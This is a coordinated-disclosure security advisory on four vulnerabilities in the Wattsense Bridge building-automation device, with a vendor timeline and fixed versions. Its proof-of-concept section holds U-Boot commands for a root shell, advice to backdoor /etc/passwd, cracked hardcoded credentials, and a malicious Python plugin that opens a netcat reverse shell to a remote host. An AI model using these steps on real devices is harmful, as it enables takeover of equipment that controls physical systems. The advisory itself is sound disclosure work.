Multiple vulnerabilities in Wattsense Bridge

Title

Multiple vulnerabilities

Product

Wattsense - Wattsense Bridge

Vulnerable Version

Hardware Revision: WSG-EU-SC-14-00, 20230801 | Firmware Revision: Wattsense (Wattsense minimal) 5.7.2 ws-box-v1.3

Fixed Version

Issue 2&3 >=6.4.1, Issue 4 >=6.1.0

CVE Number

CVE-2025-26408, CVE-2025-26409, CVE-2025-26410, CVE-2025-26411

Impact

high

Homepage

https://www.wattsense.com

Found

20.11.2023

By

Constantin Schieber-Knöbl, Stefan Schweighofer, Steffen Robertz (Office Vienna) | SEC Consult Vulnerability Lab

Management summary

The Wattsense Bridge device was affected by multiple vulnerabilities. The issues affected the hardware of the device as well as the firmware that is running on the device. It was possible to access a debug interface (JTAG) of the device, as well as the bootloader over a serial interface. On the firmware side, hard-coded credentials were found and an authenticated remote code execution vulnerability that allowed an attacker to take over a single device with the highest privileges (root).

Vendor description

"Buildings in the EU are responsible for 40% of our energy consumption and 36% of greenhouse gas emissions. At Wattsense, we believe that to reduce those hard-hitting numbers and positively change our environment, we must bring technology, mostly reserved for new or large facilities, to smaller and medium-sized buildings. Wattsense gives property owners the power to make their buildings more sustainable."

Source: https://www.wattsense.com/about

Business recommendation

The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.

Vulnerability overview/description

For the vulnerabilities 1-4 the following impact arises, if one of these vulnerabilities is successfully exploited. An attacker with physical access to the device can control the measurements and switching behavior of the device by e.g., installing a backdoor for later remote access. Since the Wattsense Bridge can trigger actions on physical devices, safety violations and physical damages are possible.

1) Access to JTAG Interface (CVE-2025-26408)

The JTAG interface can be accessed with physical access to the PCB. After connecting to the interface, full access to the device is possible. This enables an attacker to extract information, modify and debug the device's firmware.

2) Access to Bootloader and Shell Over Serial Interface (CVE-2025-26409)

A serial interface can be accessed with physical access to the PCB. After connecting to the interface, access to the bootloader is possible, as well as a Linux login prompt. The bootloader access can be used to gain a root shell on the device.

3) Weak Hardcoded Credentials (CVE-2025-26410)

The firmware of all devices contain the same hardcoded user and root credentials. The user password can be easily recovered via password cracking attempts. The recovered credentials can be used to log into the device via the login shell that is exposed by the serial interface, described in the previous vulnerability "2) Access to Bootloader and Shell Over Serial Interface".

4) Authenticated Arbitrary Python File Upload via Plugin Manager (CVE-2025-26411)

An authenticated attacker is able to use the Plugin Manager of the web interface to upload malicious python files to the device. This enables an attacker to gain remote root access to the device. An attacker needs a valid user account on the Wattsense web interface, where valid Wattsense Bridge devices are configured, to be able to conduct this attack.

Proof of concept

1) Access to JTAG Interface (CVE-2025-26408)

The unlocked JTAG interface is exposed on the stamp hole expansion interface of the system on module (SoM) processing PCB (Myirtech MYC-Y6ULX) and is documented in the related datasheet. By soldering the appropriate pins (TMS, TCK, TDI, TDO, TRST) to the PCB, the JTAG port is accessible by an adaptor. The MOD pin can be left unconnected and enables software debug features when no high signal is provided with a pull-up. The Segger J-Link PRO JTAG adaptor is used to connect. The debugging software OpenOCD can then be used to manipulate and read the firmware. This grants an attacker with physical access to the device full control of the device.

Access to JTAG interface
Figure 1: Access to JTAG interface

2) Access to Bootloader and Shell Over Serial Interface (CVE-2025-26409)

The serial interface on the Wattsense Bridge can be accessed by connecting to the following pin header (GND, TX, RX) that is present on the PCB:

--------|
 +-+    | 
 |o|GND |
 |o|RX  |
 |o|TX  |
 +-+    |
       Micro USB Port
        |

Access to bootloader via serial interface
Figure 2: Access to bootloader over serial interface pin headers (GND, TX, RX)

A serial-USB adaptor (e.g., FT232 based board) can be used to access the serial interface. The following settings on an arbitrary terminal-program are necessary:

  • Voltage: 3.3V
  • Speed: 115200 Baud
  • Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1)

After a successful connection, the bootloader is available by pressing any key at startup. With the resulting U-Boot command shell, the environment variables of the boot process can be modified. This allows an attacker to launch a root shell during the boot process:

=> setenv mmcargs "setenv bootargs console=${console},${baudrate} root=${mmcpath} ${mmcroot}
${raucslot} init=/bin/sh"
=> boot

An attacker is now able to remount the file system to be readable and writeable in the root shell:

# mount -o remount, rw /

At this point an attacker can for example backdoor the device with a new root user by appending a line to the /etc/passwd file. Now the boot environment needs to be reset to the previous state. After starting the device, a Linux login prompt is presented, where the newly created backdoor account can then be used to login into the system.

3) Weak Hardcoded Credentials (CVE-2025-26410)

The firmware on all devices includes the same hardcoded user and root password hash. The user password hash can easily be cracked with the password cracking tool john:

$ john shadow
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cracked 1 password hash
No password hashes left to crack (see FAQ)

$ john --show shadow
wattsense:wattsense::0:99999:7:::
1 password hash cracked, 0 left

The user's password can then be used for example to also log into the system as a normal user via the vulnerability described in "2) Access to Bootloader and Shell Over Serial Interface".

4) Authenticated Arbitrary Python File Upload via Plugin Manager (CVE-2025-26411)

The "Plugin Manager" feature of the Wattsense web interface allows an authenticated attacker to upload malicious python files to the Wattsense bridge. With the following python code it is possible to gain a remote root shell on a targeted device:

from wattsense.azote import Plugin
import os

class WriteSetpoint (Plugin):
 def __init__(self):
   os.system("nc -e /bin/sh <remote_host> <remote_port>")
   super().__init__()
 
 def callback(self,variable,value,timestamp):
   if variable == 'ERS_EYE_PRESENCE' and value == 1:
     self.publish('MCLIMAT_SETPOINT', "0E18:1")
   else:
     self.publish('MCLIMAT_SETPOINT', "0E12:1")

Vulnerable / tested versions

The following version has been tested which was the latest version available at the time of the test:

  • Wattsense Bridge
    • Hardware Revision: WSG-EU-SC-14-00, 20230801
    • Firmware Revision: Wattsense (Wattsense minimal) 5.7.2 ws-box-v1.3

Vendor contact timeline

2024-05-15 Contacting vendor through support@wattsense.com
2024-05-15 The Wattsense team responded within one hour and the advisory was provided to them thereafter.
2024-05-21 The Wattsense team gave an update that vulnerability 3 and 4 is already fixed and they are working on resolving the other ones (1-2) as well. Issue 5 will be worked on afterwards when access to the device is further blocked.
2024-05-22 Asking how to proceed with issue 5, if Wattsense is going to fix it or the modem supplier.
2024-05-27 Vendor: no communication with the supplier yet, current focus is blocking access to the system. We offer to contact the supplier, Wattsense will do it in parallel as well. Removing issue 5 from this advisory, creating a separate one.
2024-06-18 Contacting Wattsense regarding a direct contact for the supplier as they are unresponsive.
2024-06-25 Vendor: only a distributor contact is available to them, they will look into it. Furthermore, issue 2 is fixed now.
2024-07-12 Vendor: The devices will receive updates starting from 2024-07-15. As some devices are not always connected, the vendor estimates that most devices should be updated by the end of September 2024.
2024-11-13 Asking for more information about affected firmware versions and how to proceed regarding the advisory release. No response.
2024-12-10 Asking for a status update.
2024-12-10 Vendor: Issue 1 is in the backlog. Issue 2 and issue 3 are fixed in version >= 6.4.1.
2024-12-16 Asking regarding the CVE reservation for the described issues and planned advisory, scheduling release for mid January; No response.
2025-02-04 Informing vendor that we will assign CVE and release the advisory shortly.
2025-02-11 Coordinated release of advisory.

Solution

The vendor communicated during initial contact that the following vulnerabilities were already fixed or being worked on:

  • Vulnerability 1: Vendor: Requires more attacker knowledge and higher physical access. The device is meant to be installed at a restricted access physical location. The issue will be put in the backlog of the Wattsense team.
  • Vulnerability 2: fixed in recent FW versions BSP >= 6.4.1
  • Vulnerability 3: User does not exist anymore in BSP >= 6.4.1
  • Vulnerability 4: fixed in recent FW versions BSP >= 6.1.0

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

 

EOF Steffen Robertz, Constantin Schieber-Knoebl, Stefan Viehboeck / @2025

 

Interested to work with the experts of SEC Consult? Send us your application.
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices

Back